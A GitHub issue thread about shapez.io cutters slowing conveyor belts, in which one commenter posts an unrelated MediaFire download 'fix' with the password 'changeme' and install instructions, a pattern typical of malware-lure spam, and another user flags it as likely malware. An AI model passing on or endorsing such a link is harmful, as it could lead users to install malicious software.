### ISSUE TITLE
There is a problem about the cutters causing the conveyor belt to slow down. 

### ISSUE THREAD

**Issue by RainMan-pp** [tobspr-games/shapez.io#1605]
If you use four or more cutters in a row, the item on the entire conveyor belt will lose about 1 average speed. The cutter(QUAD) also has this problem. 
This is not a game based on the rules of real-world physics, so such errors should not exist.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by dengr1065** [comment]
Looks very suspicious to me, possibly malware? Nobody sends a "fix" like that.
